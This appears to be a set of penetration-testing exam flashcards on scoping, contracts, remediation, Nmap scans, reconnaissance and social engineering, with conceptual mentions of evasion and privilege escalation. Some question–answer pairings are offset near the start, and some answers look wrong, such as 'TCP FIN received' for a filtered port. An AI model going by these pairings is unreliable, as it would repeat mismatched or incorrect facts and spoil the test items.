You have just concluded a penetration test for a client. During the test, you were able to use social engineering techniques to gain access to the server room inside the client's facility. To address this vulnerability, you recommend that the client require security awareness training for all employees every six months. What type of solution is this?
Process
You have just concluded a penetration test for a client. During the test, you were able to use social engineering to convince the organization's accounts payable clerk to send a large ACH payment to a fictitious bank account. To address this vulnerability, you recommend that the client implement division of duties such that two individuals must sign off on all payouts. What type of solution is this?
Process
You have just concluded a penetration test for a client. During the test, you were able to use stale user accounts associated with former employees to gain access to a sensitive file server. To address this vulnerability, you recommend that the client remove user accounts whenever an employee leaves the organization. What type of solution is this?
Randomize the local Administrator credentials.
You have just concluded a penetration test for a client. In your findings, you note that all of the Windows desktop systems in the organization have the same password assigned to the local Administrator user account. What could you recommend to remediate this problem?
Implement LAPS.
You have just concluded a penetration test for a client. In your findings, you note that all of the Windows desktop systems in the organization have the same password assigned to the local Administrator user account. When you report this to the client, they indicate that are aware of this and that they did this deliberately to reduce management complexity. What solution could you recommend that would remediate the vulnerability without increasing management complexity?
netstat
You have just concluded a penetration test for a client. In your findings, you report that a Linux database server has a large number of unnecessary open services, increasing its attack surface. In your final report, you recommend that the client analyze the system and remove any applications or services that aren't required for its role. Which tool should you suggest they use to check for listening network ports on the server?
Reconfigure the system to send log entries to a dedicated log server.
You have just concluded a penetration test for a client. In your findings, you report that a Linux database server shows evidence of having been compromised in the past. The attacker tried to cover his or her tracks by manually modifying the local log files but missed one key entry that revealed the compromise. What should you recommend the client do?
Uninstall all unnecessary services from the server.
You have just concluded a penetration test for a client. In your findings, you report that a Linux web server in the data center has the Apache web server, MySQL database, DNS, CUPS, DHCP, IMAP, and POP3 services running. What should you recommend the client do to remediate this situation?
Escape data.
You have just concluded a penetration test for a client. In your findings, you report that a web application that was developed in-house and that the organization uses to manage customer orders is susceptible to SQL injection attacks. What should you recommend the client do to remediate this?
Rewrite the code to sanitize user input.
You have just concluded a penetration test for a client. In your findings, you report that a web application that was developed in-house and that the organization uses to manage customer orders is susceptible to SQL injection attacks. What should you recommend the client do to remediate this?
Account lockout threshold
You have just concluded a penetration test for a client. In your findings, you report that brute-force password attacks against Windows domain user accounts were successful because nothing stopped the password-cracking software from trying password after password for a given user. Which of the following Windows domain Group Policy settings could you recommend the client implement to remediate this issue?
chage
You have just concluded a penetration test for a client. In your findings, you report that users are allowed to keep the same password indefinitely, which increases the likelihood that they will be compromised at some point. Given that the client users Linux desktops and servers, which of the following Linux commands should you recommend they use to fix this issue?
Fingerprint scan.
You have just concluded a penetration test for a client. In your findings, you report that users are required to provide a username and a password to authenticate. You recommend that the organization implement multifactor authentication. Which of the following could they require users to supply when authenticating to accomplish this?
/etc/shadow
You have just concluded a penetration test for a client. In your findings, you report that you found several user accounts on a Linux file server that have no password assigned to them. In your final report, you recommend that the client analyze the system and assign passwords to all user accounts. Which file on the server should they review to accomplish this?
Password must meet complexity requirements. Minimum password length.
You have just concluded a penetration test for a client. In your findings, you report that you were able to compromise several users' Windows accounts because they used passwords such as password, aaa, and 1234. Which of the following domain Group Policy settings could you recommend they implement to prevent weak password complexity? (Choose two.)
chage
You have just concluded a penetration test for a client. In your findings, you report that, while users are trained to change their passwords every 45 days, few of them actually do it because there is no mechanism in place to enforce this policy. Given that the client users Linux desktops and servers, which of the following Linux commands should you recommend they use to automatically lock user accounts if users don't change their passwords after 45 days?
People
You have just concluded a penetration test for a client. The client has more than 2,000 employees, but only two of them are network administrators. During the test, you were able to quickly overwhelm them with the sheer volume of your attacks. To address this vulnerability, you recommend that the client hire additional network administrators who have cybersecurity credentials and experience. What type of solution is this?
Depends on the client contract
You have just finished writing a report of findings for a client after a penetration test. How long is your organization required to store the document after the test is complete?
Burn the report to an optical disk and store it in a locked safe bolted to your desk.
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client's written report of findings?
Print a hard copy and store it in a locked filing cabinet that has been bolted to the floor.
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client's written report of findings?
Save it to an encrypted file on a file server.
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client's written report of findings?
Save the file to an encrypted flash drive and store it in a locket cabinet.
You have just finished writing a report of findings for a client after a penetration test. Which of the following is an appropriate way to store your client's written report of findings?
Review the PCI-DSS requirements.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. What should you do first in the scoping process?
A password policy must be in place.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. Which of the following tests need to be included in the assessment?
Install and update antivirus software on all systems.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. Which of the following tests need to be included in the assessment?
Encrypt the transmission of cardholder data. Remove all default passwords from software and hardware devices.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. Which of the following tests need to be included in the assessment? (Choose two.)
Monitor all access to cardholder data. Restrict access to cardholder data on a need-to-know basis.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. Which of the following tests need to be included in the assessment? (Choose two.)
Physical access to cardholder data is restricted. The cardholder data environment (CDE) is isolated from the rest of the network.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. Which of the following tests need to be included in the assessment? (Choose two.)
Analyze the testers' written log files.
You have recently concluded a penetration test for a client, and now need to write up your final conclusions. What should you do?
tcpdump Wireshark
You need to capture packets on a wired network during the information gathering phase of a gray box penetration test. Which utilities could you use on your laptop to accomplish this? (Choose two.)
Gray box
You need to conduct a penetration test for a client that best assesses the target organization's vulnerability to a malicious insider who has the network privileges of an average employee. Which type of test should you perform?
read TargetHost
You need to create a Bash script to run an exploit against the target organization. As a part of the script, you need to prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
$TargetHost = read-host -Prompt
You need to create a PowerShell script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
TargetHost = input('Please enter a hostname:')
You need to create a Python script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
TargetHost = gets
You need to create a Ruby script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
The requesting party
You need to deliver soften electronic copy of a penetration testing report to a client. Who should the copy be delivered to?
Shred the report in a cross-cut shredder.
You need to dispose of several penetration test reports from old clients. Hard copies of the reports are stored in a locked filing cabinet that has been bolted to the floor. Which of the following is the best way to do this?
Use disk wiping software on the drive.
You need to dispose of several penetration test reports from old clients. The files are stored on a removable hard drive that is stored in a locked safe. Which of the following is the best way to do this?
Smash the drives with a hammer.
You need to dispose of several penetration test reports from old clients. The files are stored on flash drives that are stored in a locked cabinet. Which of the following is the best way to do this?
Shred the discs.
You need to dispose of several penetration test reports from old clients. The files are stored on rewritable optical discs that are stored in a locked cabinet. Which of the following is the best way to do this?
Date of distribution Unique ID
You need to distribute a penetration testing report to a client. What information should you record in your distribution tracking log? (Select all that apply.)
Schedule the scan to run in the early hours of the morning.
You need to perform a vulnerability scan as part of a gray box penetration test. The rules of engagement specify that the internal system administrators are not to receive any warning of when your scan will occur, that you are to avoid detection, and that your scan should gather as much information as possible. What should you do?
Throttle the scan to use minimal bandwidth.
You need to perform a vulnerability scan as part of a gray box penetration test. The rules of engagement specify that the internal system administrators are not to receive any warning of when your scan will occur, that you are to avoid detection, and that your scan should gather as much information as possible. What should you do?
Assigning the SGID special permission Assigning the SUID special permission
You need to use privilege escalation on a Linux system during a penetration test. Which features of the operating system can be used to allow an executable to be run with superuser-level permissions? (Choose two.)
Include a disclaimer in the agreement indicating that the results are valid only at the point in time when the test was performed.
You own a small penetration testing consulting firm. You are worried that a client may sue you months or years after penetration testing is complete if their network is compromised by an exploit that didn't exist when the test was conducted. What should you do?
Include a disclaimer in the agreement indicating that the test methodology can impact the comprehensiveness of the test.
You own a small penetration testing consulting firm. You are worried that a client who requests a black box assessment may sue you after penetration testing is complete if their network is compromised by an exploit. What should you do?
Enter completely unexpected data into the application.
You want to generate sample application requests for an in-house developed web application that a client's users use every day to complete their day-to-day tasks. How should this be done?
No, the rules of engagement (ROE) for the test should be documented and signed by both parties.
You work at a penetration testing consulting firm. An organization that you have not worked with previously calls and asks you to perform a black box assessment of its network. You agree on a price and scope over the phone. After quickly designing the test on paper, you begin execution later that afternoon. Was this test conducted properly?
Celebrate! This means the client wants to engage your firm for multiple engagements.
You work for a penetration testing consulting firm and are negotiating with a potential client. The client has suggested that your organization sign an MSA with their organization. What should you do?
White box
You work for a penetration testing firm. A client calls and asks you to perform an exhaustive test that deeply probes their infrastructure for vulnerabilities. What kind of test should you recommend?
Purchase order (PO)
You work for a penetration testing firm. A potential client called about your services. After reviewing what your organization can do, the client decides to schedule a single black box test. If they are happy with the results, they may consider future tests. Which of the following will you likely ask the client to sign first?
Nondisclosure agreement (NDA)
You work for a penetration testing firm. You go to dinner with a potential client. To demonstrate your organization's technical expertise with penetration testing, you list several of your other clients by name and describe in detail various problems your assessments discovered at each one. Which of the following was violated when you did this?
Assessing impact tolerance
You work for a penetration testing firm. You have been scoping an upcoming penetration test with a client. Within the scope document, you include verbiage warning that the methodology and techniques used for this test could potentially take critical systems offline for a period of time. You ask the client to confirm that this is acceptable. What is this an example of?
The proper signing authority
You work for a penetration testing firm. You have been scoping an upcoming penetration test with a client. You have worked with the CIO to identify the scope of the assessment, such as in- and out-of-scope systems, the methodology to be used, the techniques allowed, and the schedule. You have a final draft of the agreement ready to be signed. Who should sign it?
Red team
You work on the security team for a large organization. Your team has been tasked with conducting an internal penetration test to verify whether your organization's IT staff can adequately defend against it. What type of assessment is being used in this scenario?
Critical
You're prioritizing vulnerabilities discovered during a vulnerability scan. One vulnerability you found has a Common Vulnerability Scoring System (CVSS) score of 10. To which risk category does this vulnerability belong?
Low
You're prioritizing vulnerabilities discovered during a vulnerability scan. One vulnerability you found has a Common Vulnerability Scoring System (CVSS) score of 3.8. To which risk category does this vulnerability belong?
Medium
You're prioritizing vulnerabilities discovered during a vulnerability scan. One vulnerability you found has a Common Vulnerability Scoring System (CVSS) score of 5.3. To which risk category does this vulnerability belong?
High
You're prioritizing vulnerabilities discovered during a vulnerability scan. One vulnerability you found has a Common Vulnerability Scoring System (CVSS) score of 7.2. To which risk category does this vulnerability belong?
Enter /bin/bash ~/myexploit at the shell prompt. Enter chmod u+x ~/ myexploit; then enter ~/ myexploit at the shell prompt.
You've created a Bash script in your home directory on a Linux system named myexploit. How can you execute it? (Choose two.)
CERT
You've heard that Adobe has just released a security update that addresses vulnerabilities recently discovered in Photoshop. Which open source research source could you use to learn more about the update and which vulnerabilities it is intended to fix?
CAPEC
You've heard that a new physical security exploit is going around where the attacker uses a special type of key called a bump key. Which open source research source would most likely contain information about how this exploit works?
Transference
Your client hosts a large e-commerce website that sells clothing and accessories. During a penetration test, a tester was able to intercept customers' credit card numbers as they were being processed by an internal card processing application. To keep this from happening again, the client decides to outsource all credit card processing to a third-party processor. All transactions are redirected to the third-party processor such that your client never sees the actual credit card data. Which type of risk response is described in this scenario?
Penetration testing report
Your company has suffered a data breach. You are now being asked to show proof that you have been doing your due diligence to secure the environment. What can you provide to show this proof?
Situational awareness
Your organization is conducting a black box penetration test for a client. There are five members on your penetration test team. During the test, you continuously communicate with the other members of the team via email and text messaging to coordinate the timing of activities, including reconnaissance, enumeration, exploits, and so on. What is this process called?
Situational awareness
Your organization is conducting a black box penetration test for a client. There are five members on your penetration test team. During the test, you continuously communicate with the other members of the team via email and text messaging to ensure everyone knows what the others are doing. What is this process called?
Situational awareness
Your organization is conducting a black box penetration test for a client. There are three testers on your team. At the beginning of the process, you have a team meeting to plan how the test will be conducted, when certain activities will occur, and which team members will be responsible for performing specific tasks. What is this process called?
Statement of objective (SOO) Performance work statement (PWS)
Your penetration testing consulting firm has been negotiating a contract with the U.S. federal government to run penetration tests against some of its systems. Which agreements will you be asked to sign instead of a statement of work (SOW)? (Choose two.)
Domain
________ enumeration can be accomplished using various tools or simply using Google searches with site: method.
Risk acceptance
__________ indicates that the organization is willing to accept the level of risk associated with a given activity or process.
Unix
iOS runs on Apple hardware and is based on Darwin, an open-source OS originating from which operating system family?
Stealth scan
ou are a penetration tester, and your client wants you to scan their system and will go to great lengths to avoid detection. The client does not want their cybersecurity team to be aware that a penetration test is underway. What type of scan will you be performing?
Poisons
A common vulnerability in LLMNR involves an attacker spoofing an authoritative source for name resolution on a victim system by responding to LLMNR traffic over UDP port 5355 and NBT-NS traffic over UDP port 137. The attacker ________ the LLMNR service to manipulate the victim's system.
Scope creep
A penetration testing firm has not properly identified what technical and nontechnical elements will be required for a penetration test. The scope has increased, and the firm finds itself in a bad situation with a customer, as it may not have time to complete all the tests that were advertised. Which of the following terms best describes this situation?
Ethical Hacker
A person who hacks into a computer network in order to test or evaluate its security, rather than with malicious or criminal intent is considered a(n) __________.
Social engineering testing
A potential customer is looking to test the security of its network. One of the customer's primary concerns is the security awareness of its employees. Which type of test would you recommend that the company perform as part of the penetration test?
Perform man-in-the-middle (MITM) attacks
ARP spoofing can be used to do which of the following?
TCP
An Nmap _______ scan uses the underlying operating systems networking mechanisms and is typically very noisy.
SYN
An Nmap _________scan is also known as a "half-open" scan because it doesn't open a full TCP connection.
Malvertising
In a _________ attack, a user visits a legitimate website and clicks on a malicious ad. Then the user is redirected to a malicious site and downloads malware.
When there is poor change management in the penetration testing engagement
In which of the following circumstances might you encounter scope creep?
API
REST and SOAP are examples of ____________ standards and technologies.
BGP OSPF EIGRP
Route manipulation attacks can be performed using what routing protocol?
safeguarding electronic protected health information
The HIPAA Security Rule is focused on __________________.
IoT devices
The Mirai botnet is primarily made up of which type of devices?
smb-eunm-users.nse
The Nmap __________ script uses MSRPC to enumerate valid account information about the target.
Scapy
The _______ tool can be used to enumerate information about targets by using packet-crafting commands.
Malicious intent
The main difference between an ethical hacker and a nonethical hacker is that a nonethical hacker has ________.
The amount and type of risk that an organization is prepared to pursue, retain, or take
What is risk appetite?
Reconnaissance
When an attacker is planning a course of action to gain access to a target, what is the initial phase the attacker performs?
Services
When performing reconnaissance on a network, you determine which devices are alive. What would be the next thing you would want to enumerate on the live devices?
hackertarget
Which Recon-ng module can be used to gather subdomains for a target?
Internet access
Which is not a typical requirement for a penetration testing lab environment?
Black-box test
Which kind of penetration test is used by a tester who starts with very little information?
Open source intelligence
Which method of information gathering uses publicly available information sources to collect and analyze information about a target?
-sF
Which of the following Nmap options would you want to try if your SYN scans were being identified by network filters?
The contract is one of the most important documents in your engagement. It specifies the terms of the agreement and how you will get paid, and it provides clear documentation of the services that will be performed. The document should be very specific, easy to understand, and without ambiguities. Any ambiguities will likely lead to customer dissatisfaction and friction. Legal advice (by a lawyer) is always recommended for any contract.
Which of the following are true about a penetration testing engagement contract? (Select all that apply.)
Goals-based (objectives-based) assessments Compliance-based assessments
Which of the following are types of penetration testing assessments? (Select all that apply.)
Evil twin
Which of the following best describes an attack in which the threat actor creates a rogue access point and configures it exactly the same as the existing wireless network?
Open SMTP relays
Which of the following can be abused to send spoofed emails, spam, phishing, and other email-related scams?
DNS cache poisoning involves manipulating the DNS resolver cache by injecting corrupted DNS data. This is done to force the DNS server to send the wrong IP address to the victim, redirecting the victim to the attacker's system.
Which of the following describes a DNS cache poisoning attack?
KARMA is a man-in-the-middle attack that involves creating a rogue AP and allowing an attacker to intercept wireless traffic.
Which of the following describes a KARMA attack?
Botnet
Which of the following describes a collection of compromised hosts that can be used to carry out multiple attacks?
SOW
Which of the following documents includes elements such as the scope of the work to be performed, the location of the work, and the payment schedule?
Rules of engagement
Which of the following documents includes the penetration testing timeline?
Blue team
Which of the following is a corporate security team that defends the organization against cybersecurity threats (such as the security operation center analysts, computer incident response teams [CSIRTs], and information security [InfoSec] teams)?
Using multiple tools of the same kind
Which of the following is a good method for validating the findings of a penetration test?
Red team
Which of the following is a group of cybersecurity experts and penetration testers that are hired by an organization to mimic a real threat actor?
War driving
Which of the following is a methodology attackers use to find wireless access points wherever they may be?
EternalBlue
Which of the following is a popular SMB exploit that has been used in ransomware?
Empire
Which of the following is a popular tool that can be used to perform golden ticket and many other types of attacks?
Mimikatz
Which of the following is a tool that many penetration testers, attackers, and even malware use for retrieving password hashes from memory and also as a useful post-exploitation tool?
KRACK
Which of the following is an attack against the WPA and WPA2 protocols?
POODLE
Which of the following is an example of a downgrade attack?
SMS phishing
Which of the following is an example of a social engineering attack that is not related to email?
The SOW defines confidential material, which is knowledge and information that should not be disclosed and should be kept confidential by both parties.
Which of the following is not true about the statement of work (SOW)?
SNMPv2c uses two authenticating credentials: The first is a public community string to view the configuration or to obtain the health status of the device, and the second is a private community string to configure the managed device. SNMPv3 authenticates SNMP users by using usernames and passwords and can protect confidentiality. SNMPv2 does not provide any confidentiality protection.
Which of the following is one of the differences between SNMPv2c and SNMPv3?
Phishing
Which of the following is the term for an attacker presenting to a user a link or an attachment that looks like a valid, trusted resource?
WEP keys exists in two sizes: 40-bit (5-byte) and 104-bit (13-byte) keys. In addition, WEP uses a 24-bit IV, which is prepended to the PSK. When you configure a wireless infrastructure device with WEP, the IVs are sent in the clear.
Which of the following is true about WEP?
An interrogator pays attention to the victim's posture, body language, skin color, and eye movement.
Which of the following is true about interrogation?
Pretexting or impersonation involves presenting yourself as someone else in order to gain access to information.
Which of the following is true about pretexting?
Scarcity can be used to create a feeling of urgency in a decision-making context. It is possible to use specific language in an interaction to present a sense of urgency and manipulate the victim.
Which of the following is true about social engineering motivation techniques?
Spear phishing is phishing attempts that are constructed in a very specific way and directly targeted to specific individuals or companies.
Which of the following is true about spear phishing?
The base group represents the intrinsic characteristics of a vulnerability that are constant over time and do not depend on a user-specific environment.
Which of the following is true about the base group of CVSS?
Voice phishing is also referred to as "vishing."
Which of the following is true about voice phishing?
Whaling is similar to phishing and spear phishing; however, this type of attack is targeted at high-profile business executives and key individuals within a corporation.
Which of the following is true about whaling?
Whaling is similar to phishing and spear phishing.
Which of the following is true?
TCP port 445: NetBIOS Session Service protocol, used for sharing files between different operating system
Which of the following port descriptions is not correct?
Malvertising
Which of the following refers to the act of incorporating malicious ads on trusted websites, which results in users' browsers being inadvertently redirected to sites hosting malware?
PCI DSS must be adopted by any organization that transmits, processes, or stores payment card data or directly or indirectly affects the security of cardholder data.
Which of the following statements is true?
Ransomware
Which of the following terms describes an attack in which the end user's system hard drive or files are encrypted with a key known only to the attacker?
Recon-ng
Which of the following tools is a framework used for active open source intelligence gathering?
DNSRecon
Which of the following tools is primarily used to enumerate domain information?
Compliance scan
Which of the following vulnerability scan types would you recommend for a company that is concerned with complying with HIPAA?
Responsible disclosure
Which of the following would be a characteristic of an ethical hacker?
PCI penetration testing guidance
Which penetration testing methodology was created for the purpose of providing a minimum level of security requirements for handling credit card information?
White-box test
Which type of penetration test would provide the tester with information such as network diagrams and credentials?
Passive
Which type of reconnaissance would be used when it is imperative that the target not be able to detect your activity?
Active reconnaissance
Which type of reconnaissance would involve using tools that send network probes directly at a target device?
Hacktivist
Which type of threat actor operates with a political or social purpose to embarrass or financially affect the victim?
Organized crime
Which type of threat actor would have the primary intent of monetary gain?
Authenticated scan
Which type of vulnerability scan would require the scanner to log in to the target system and run privileged-level commands to gather results?
Black-box test
You are hired to complete a penetration test. The customer gives you only a domain name and IP address as the target information. Which type of penetration test are is the customer asking you to perform?
Insider threat
You are performing a penetration test for a customer. You identify a client machine that is downloading the contents of the customer database, which stores the customer's intellectual property. You then identify an employee who is exporting the data to a USB drive. Which type of threat actor is this likely to be?
TCP FIN received
You are running an Nmap TCP FIN scan against a target device. The result of the scan indicates that port 80 is filtered. What response was likely received from the target that led to Nmap making this determination?
-sS
You are running an Nmap port scan, and it is being blocked by a network filter. Which of the following options could you try to avoid the filters?
Disclaimer
You can create a document or include text in a contract, an SOW, or your final report specifying that you conducted the penetration testing on the applications and systems that existed as of a clearly stated date. This is an example of which of the following?
A Swagger document
You can obtain several support resources from an organization that hired you to perform a penetration test. Which of the following is an example?
Web application test
Your company has an Internet-facing website that is critical to its daily business. Which type of penetration test would you prioritize?
Black-box test
Your company needs to determine if the security posture of its computing environment is sufficient for the level of exposure it receives. You determine that you will need to have a penetration test completed on the environment. You would like the testing to be done from the perspective of an external attacker. Which type of penetration test would be best?
Passive
___________ reconnaissance is a method of information gathering in which the attacker uses techniques that are not likely to be detected by the target.
Spear phishing
____________ is phishing attempts that are constructed in a very specific way and directly targeted to specific individuals or companies.
Packet crafting
__________________ is the method of enumeration used by the Scapy tool.